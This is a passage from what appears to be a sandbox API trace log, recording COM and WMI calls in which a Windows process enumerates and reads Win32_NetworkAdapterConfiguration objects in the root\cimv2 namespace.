	[0127.114] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71d2f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d2f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.115] CoGetContextToken (in: pToken=0xd7ef71ce70 | out: pToken=0xd7ef71ce70) returned 0x0
	[0127.115] CoGetContextToken (in: pToken=0xd7ef71cdb0 | out: pToken=0xd7ef71cdb0) returned 0x0
	[0127.115] IUnknown:AddRef (This=0x2ad3babb9f8) returned 0x2
	[0127.115] IUnknown:QueryInterface (in: This=0x2ad3babb9f8, riid=0xd7ef71cef0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xd7ef71ced0 | out: ppvObject=0xd7ef71ced0*=0x2ad206b9670) returned 0x0
	[0127.116] IUnknown:Release (This=0x2ad3babb9f8) returned 0x2
	[0127.116] IUnknown:AddRef (This=0x2ad206b9670) returned 0x3
	[0127.116] IEnumWbemClassObject:Clone (in: This=0x2ad206b9670, ppEnum=0xd7ef71d330 | out: ppEnum=0xd7ef71d330*=0x2ad3bae1500) returned 0x0
	[0127.117] IUnknown:QueryInterface (in: This=0x2ad3bae1500, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cf88 | out: ppvObject=0xd7ef71cf88*=0x2ad3bae1508) returned 0x0
	[0127.117] IClientSecurity:QueryBlanket (in: This=0x2ad3bae1508, pProxy=0x2ad3bae1500, pAuthnSvc=0xd7ef71cf80, pAuthzSvc=0xd7ef71cf7c, pServerPrincName=0xd7ef71cfa8, pAuthnLevel=0xd7ef71cf78, pImpLevel=0xd7ef71cf94, pAuthInfo=0xd7ef71cfb8, pCapabilites=0xd7ef71cf90 | out: pAuthnSvc=0xd7ef71cf80*=0xa, pAuthzSvc=0xd7ef71cf7c*=0x0, pServerPrincName=0xd7ef71cfa8, pAuthnLevel=0xd7ef71cf78*=0x6, pImpLevel=0xd7ef71cf94*=0x3, pAuthInfo=0xd7ef71cfb8, pCapabilites=0xd7ef71cf90*=0x1) returned 0x0
	[0127.117] IUnknown:Release (This=0x2ad3bae1508) returned 0x1
	[0127.117] IUnknown:QueryInterface (in: This=0x2ad3bae1500, riid=0x7ffbf68f1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cf28 | out: ppvObject=0xd7ef71cf28*=0x2ad3bb26948) returned 0x0
	[0127.117] IUnknown:QueryInterface (in: This=0x2ad3bae1500, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71ceb8 | out: ppvObject=0xd7ef71ceb8*=0x2ad3bae1508) returned 0x0
	[0127.118] IClientSecurity:SetBlanket (This=0x2ad3bae1508, pProxy=0x2ad3bae1500, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0127.118] IUnknown:Release (This=0x2ad3bae1508) returned 0x2
	[0127.118] IUnknown:Release (This=0x2ad3bb26948) returned 0x1
	[0127.118] CoTaskMemFree (pv=0x2ad3baca6d0) 
	[0127.118] IUnknown:QueryInterface (in: This=0x2ad3bae1500, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cb50 | out: ppvObject=0xd7ef71cb50*=0x2ad3bb26948) returned 0x0
	[0127.119] IUnknown:QueryInterface (in: This=0x2ad3bb26948, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71cbd0 | out: ppvObject=0xd7ef71cbd0*=0x0) returned 0x80004002
	[0127.119] IUnknown:QueryInterface (in: This=0x2ad3bb26948, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c968 | out: ppvObject=0xd7ef71c968*=0x0) returned 0x80004002
	[0127.119] IUnknown:AddRef (This=0x2ad3bb26948) returned 0x3
	[0127.119] CoGetContextToken (in: pToken=0xd7ef71c820 | out: pToken=0xd7ef71c820) returned 0x0
	[0127.119] IUnknown:QueryInterface (in: This=0x2ad3bb26948, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c7e0 | out: ppvObject=0xd7ef71c7e0*=0x2ad3bb26828) returned 0x0
	[0127.119] IMarshal:GetUnmarshalClass (in: This=0x2ad3bb26828, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c810 | out: pCid=0xd7ef71c810) returned 0x0
	[0127.119] IUnknown:Release (This=0x2ad3bb26828) returned 0x3
	[0127.119] CoGetContextToken (in: pToken=0xd7ef71c7f0 | out: pToken=0xd7ef71c7f0) returned 0x0
	[0127.119] IUnknown:AddRef (This=0x2ad3bb26948) returned 0x4
	[0127.119] IUnknown:QueryInterface (in: This=0x2ad3bb26948, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c908 | out: ppvObject=0xd7ef71c908*=0x2ad3bb26910) returned 0x0
	[0127.120] IUnknown:Release (This=0x2ad3bb26948) returned 0x4
	[0127.120] IRpcOptions:Query (in: This=0x2ad3bb26910, pPrx=0x2ad3bb26948, dwProperty=2, pdwValue=0xd7ef71c978 | out: pdwValue=0xd7ef71c978) returned 0x80004002
	[0127.120] IUnknown:Release (This=0x2ad3bb26910) returned 0x3
	[0127.120] IUnknown:Release (This=0x2ad3bb26948) returned 0x2
	[0127.120] CoGetContextToken (in: pToken=0xd7ef71ccf0 | out: pToken=0xd7ef71ccf0) returned 0x0
	[0127.120] CoGetContextToken (in: pToken=0xd7ef71cc30 | out: pToken=0xd7ef71cc30) returned 0x0
	[0127.120] IUnknown:AddRef (This=0x2ad3bb26948) returned 0x3
	[0127.120] IUnknown:QueryInterface (in: This=0x2ad3bb26948, riid=0xd7ef71cd70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xd7ef71cd50 | out: ppvObject=0xd7ef71cd50*=0x2ad3bae1500) returned 0x0
	[0127.120] IUnknown:Release (This=0x2ad3bb26948) returned 0x3
	[0127.120] IUnknown:Release (This=0x2ad3bae1500) returned 0x2
	[0127.120] IUnknown:Release (This=0x2ad3bae1500) returned 0x1
	[0127.120] IUnknown:Release (This=0x2ad206b9670) returned 0x2
	[0127.120] SysStringLen (param_1=0x0) returned 0x0
	[0127.121] CoGetContextToken (in: pToken=0xd7ef71d170 | out: pToken=0xd7ef71d170) returned 0x0
	[0127.121] CoGetContextToken (in: pToken=0xd7ef71d0b0 | out: pToken=0xd7ef71d0b0) returned 0x0
	[0127.121] IUnknown:AddRef (This=0x2ad3bb26948) returned 0x2
	[0127.121] IUnknown:QueryInterface (in: This=0x2ad3bb26948, riid=0xd7ef71d1f0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xd7ef71d1d0 | out: ppvObject=0xd7ef71d1d0*=0x2ad3bae1500) returned 0x0
	[0127.121] IUnknown:Release (This=0x2ad3bb26948) returned 0x2
	[0127.121] IUnknown:AddRef (This=0x2ad3bae1500) returned 0x3
	[0127.121] IEnumWbemClassObject:Reset (This=0x2ad3bae1500) returned 0x0
	[0127.121] IUnknown:Release (This=0x2ad3bae1500) returned 0x2
	[0127.124] CoTaskMemAlloc (cb=0x8) returned 0x2ad3bac2c90
	[0127.124] IEnumWbemClassObject:Next (in: This=0x2ad3bae1500, lTimeout=-1, uCount=0x1, apObjects=0x2ad3bac2c90, puReturned=0xd7ef71d3f8 | out: apObjects=0x2ad3bac2c90*=0x2ad206a5000, puReturned=0xd7ef71d3f8*=0x1) returned 0x0
	[0127.154] IUnknown:QueryInterface (in: This=0x2ad206a5000, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c720 | out: ppvObject=0xd7ef71c720*=0x2ad206a5000) returned 0x0
	[0127.155] IUnknown:QueryInterface (in: This=0x2ad206a5000, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c7a0 | out: ppvObject=0xd7ef71c7a0*=0x0) returned 0x80004002
	[0127.155] IUnknown:QueryInterface (in: This=0x2ad206a5000, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c538 | out: ppvObject=0xd7ef71c538*=0x0) returned 0x80004002
	[0127.155] IUnknown:AddRef (This=0x2ad206a5000) returned 0x3
	[0127.155] CoGetContextToken (in: pToken=0xd7ef71c3f0 | out: pToken=0xd7ef71c3f0) returned 0x0
	[0127.155] IUnknown:QueryInterface (in: This=0x2ad206a5000, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c3b0 | out: ppvObject=0xd7ef71c3b0*=0x2ad206a5008) returned 0x0
	[0127.155] IMarshal:GetUnmarshalClass (in: This=0x2ad206a5008, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c3e0 | out: pCid=0xd7ef71c3e0) returned 0x0
	[0127.155] IUnknown:Release (This=0x2ad206a5008) returned 0x3
	[0127.155] CoGetContextToken (in: pToken=0xd7ef71c3c0 | out: pToken=0xd7ef71c3c0) returned 0x0
	[0127.155] IUnknown:AddRef (This=0x2ad206a5000) returned 0x4
	[0127.155] IUnknown:QueryInterface (in: This=0x2ad206a5000, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c4d8 | out: ppvObject=0xd7ef71c4d8*=0x0) returned 0x80004002
	[0127.155] IUnknown:Release (This=0x2ad206a5000) returned 0x3
	[0127.156] IUnknown:Release (This=0x2ad206a5000) returned 0x2
	[0127.156] CoGetContextToken (in: pToken=0xd7ef71c880 | out: pToken=0xd7ef71c880) returned 0x0
	[0127.156] CoGetContextToken (in: pToken=0xd7ef71c7c0 | out: pToken=0xd7ef71c7c0) returned 0x0
	[0127.156] IUnknown:AddRef (This=0x2ad206a5000) returned 0x3
	[0127.156] IUnknown:QueryInterface (in: This=0x2ad206a5000, riid=0xd7ef71c900*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xd7ef71c8e0 | out: ppvObject=0xd7ef71c8e0*=0x2ad206a5000) returned 0x0
	[0127.156] IUnknown:Release (This=0x2ad206a5000) returned 0x3
	[0127.156] IUnknown:Release (This=0x2ad206a5000) returned 0x2
	[0127.156] IUnknown:Release (This=0x2ad206a5000) returned 0x1
	[0127.156] CoTaskMemFree (pv=0x2ad3bac2c90) 
	[0127.156] CoGetContextToken (in: pToken=0xd7ef71d200 | out: pToken=0xd7ef71d200) returned 0x0
	[0127.156] IUnknown:AddRef (This=0x2ad206a5000) returned 0x2
	[0127.502] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__GENUS", lFlags=0, pVal=0xd7ef71d370*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d36c*=0, plFlavor=0xd7ef71d368*=0 | out: pVal=0xd7ef71d370*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xd7ef71d36c*=3, plFlavor=0xd7ef71d368*=64) returned 0x0
	[0127.506] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__PATH", lFlags=0, pVal=0xd7ef71d310*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d30c*=0, plFlavor=0xd7ef71d308*=0 | out: pVal=0xd7ef71d310*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0", varVal2=0x0), pType=0xd7ef71d30c*=8, plFlavor=0xd7ef71d308*=64) returned 0x0
	[0127.506] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0") returned 0x3f
	[0127.506] CoGetObjectContext (in: riid=0xd7ef71d2a8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71d2a0 | out: ppv=0xd7ef71d2a0*=0x2ad205dbe30) returned 0x0
	[0127.506] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2ad205dbe30, pAptType=0xd7ef71d2c0 | out: pAptType=0xd7ef71d2c0*=1) returned 0x0
	[0127.506] IUnknown:QueryInterface (in: This=0x2ad205dbe30, riid=0x2ad238546d8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0xd7ef71d3c8 | out: ppvObject=0xd7ef71d3c8*=0x0) returned 0x80004002
	[0127.506] IUnknown:Release (This=0x2ad205dbe30) returned 0x2
	[0127.506] CoGetClassObject (in: rclsid=0x2ad3bb03848*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71c930 | out: ppv=0xd7ef71c930*=0x2ad3bb1f000) returned 0x0
	[0127.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x2ad3bb1f000, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c640 | out: ppvObject=0xd7ef71c640*=0x0) returned 0x80004002
	[0127.507] WbemDefPath:IClassFactory:CreateInstance (in: This=0x2ad3bb1f000, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c628 | out: ppvObject=0xd7ef71c628*=0x2ad3bb11900) returned 0x0
	[0127.507] IUnknown:QueryInterface (in: This=0x2ad3bb11900, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c530 | out: ppvObject=0xd7ef71c530*=0x2ad3bb11900) returned 0x0
	[0127.507] IUnknown:QueryInterface (in: This=0x2ad3bb11900, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c5b0 | out: ppvObject=0xd7ef71c5b0*=0x0) returned 0x80004002
	[0127.507] IUnknown:AddRef (This=0x2ad3bb11900) returned 0x3
	[0127.507] CoGetContextToken (in: pToken=0xd7ef71c200 | out: pToken=0xd7ef71c200) returned 0x0
	[0127.507] IUnknown:QueryInterface (in: This=0x2ad3bb11900, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c1c0 | out: ppvObject=0xd7ef71c1c0*=0x2ad3bb1f180) returned 0x0
	[0127.507] IMarshal:GetUnmarshalClass (in: This=0x2ad3bb1f180, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c1f0 | out: pCid=0xd7ef71c1f0) returned 0x0
	[0127.507] IUnknown:Release (This=0x2ad3bb1f180) returned 0x3
	[0127.507] CoGetContextToken (in: pToken=0xd7ef71c1d0 | out: pToken=0xd7ef71c1d0) returned 0x0
	[0127.507] IUnknown:AddRef (This=0x2ad3bb11900) returned 0x4
	[0127.507] IUnknown:QueryInterface (in: This=0x2ad3bb11900, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c2e8 | out: ppvObject=0xd7ef71c2e8*=0x0) returned 0x80004002
	[0127.507] IUnknown:Release (This=0x2ad3bb11900) returned 0x3
	[0127.508] IUnknown:Release (This=0x2ad3bb11900) returned 0x2
	[0127.508] WbemDefPath:IUnknown:Release (This=0x2ad3bb1f000) returned 0x0
	[0127.508] IUnknown:Release (This=0x2ad3bb11900) returned 0x1
	[0127.508] CoGetContextToken (in: pToken=0xd7ef71cf00 | out: pToken=0xd7ef71cf00) returned 0x0
	[0127.508] CoGetContextToken (in: pToken=0xd7ef71ce40 | out: pToken=0xd7ef71ce40) returned 0x0
	[0127.508] IUnknown:AddRef (This=0x2ad3bb11900) returned 0x2
	[0127.508] IUnknown:QueryInterface (in: This=0x2ad3bb11900, riid=0xd7ef71cf80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xd7ef71cf60 | out: ppvObject=0xd7ef71cf60*=0x2ad3bb11900) returned 0x0
	[0127.508] IUnknown:Release (This=0x2ad3bb11900) returned 0x2
	[0127.508] IUnknown:Release (This=0x2ad3bb11900) returned 0x1
	[0127.508] CoGetContextToken (in: pToken=0xd7ef71d080 | out: pToken=0xd7ef71d080) returned 0x0
	[0127.508] CoGetContextToken (in: pToken=0xd7ef71cfc0 | out: pToken=0xd7ef71cfc0) returned 0x0
	[0127.508] IUnknown:AddRef (This=0x2ad3bb11900) returned 0x2
	[0127.508] IUnknown:QueryInterface (in: This=0x2ad3bb11900, riid=0xd7ef71d100*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xd7ef71d0e0 | out: ppvObject=0xd7ef71d0e0*=0x2ad3bb11900) returned 0x0
	[0127.508] IUnknown:Release (This=0x2ad3bb11900) returned 0x2
	[0127.508] IUnknown:AddRef (This=0x2ad3bb11900) returned 0x3
	[0127.508] IWbemPath:SetText (This=0x2ad3bb11900, uMode=0x4, pszPath="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0") returned 0x0
	[0127.509] IUnknown:Release (This=0x2ad3bb11900) returned 0x2
	[0127.509] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71d340 | out: puCount=0xd7ef71d340*=0x2) returned 0x0
	[0127.509] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71d340*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d340*=0x17, pszText=0x0) returned 0x0
	[0127.509] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71d340*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d340*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.513] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71cde0 | out: puCount=0xd7ef71cde0*=0x2) returned 0x0
	[0127.513] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71cde0*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71cde0*=0x17, pszText=0x0) returned 0x0
	[0127.513] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71cde0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71cde0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.514] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71cdd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cdcc*=0, plFlavor=0xd7ef71cdc8*=0 | out: pVal=0xd7ef71cdd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71cdcc*=8, plFlavor=0xd7ef71cdc8*=64) returned 0x0
	[0127.514] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.514] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71cde0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64 | out: pVal=0xd7ef71cde0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64) returned 0x0
	[0127.514] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.515] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71cde0 | out: puCount=0xd7ef71cde0*=0x2) returned 0x0
	[0127.515] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71cde0*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71cde0*=0x17, pszText=0x0) returned 0x0
	[0127.515] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71cde0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71cde0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.515] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__CLASS", lFlags=0, pVal=0xd7ef71cdd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cdcc*=0, plFlavor=0xd7ef71cdc8*=0 | out: pVal=0xd7ef71cdd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0xd7ef71cdcc*=8, plFlavor=0xd7ef71cdc8*=64) returned 0x0
	[0127.515] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0127.516] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__CLASS", lFlags=0, pVal=0xd7ef71cde0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64 | out: pVal=0xd7ef71cde0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64) returned 0x0
	[0127.516] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0127.524] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71c870 | out: puCount=0xd7ef71c870*=0x2) returned 0x0
	[0127.524] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c870*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71c870*=0x17, pszText=0x0) returned 0x0
	[0127.524] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c870*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71c870*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.524] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71c870 | out: puCount=0xd7ef71c870*=0x2) returned 0x0
	[0127.524] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c870*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71c870*=0x17, pszText=0x0) returned 0x0
	[0127.524] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c870*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71c870*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.524] IWbemClassObject:GetNames (in: This=0x2ad206a5000, wszQualifierName=0x0, lFlags=48, pQualifierVal=0xd7ef71c868*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0xd7ef71c860 | out: pNames=0xd7ef71c860*="\x01ƀ\x08") returned 0x0
	[0127.524] SafeArrayGetDim (psa=0x2ad3bb04150) returned 0x1
	[0127.525] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__GENUS", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xd7ef71c85c*=3, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.525] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__CLASS", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.525] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
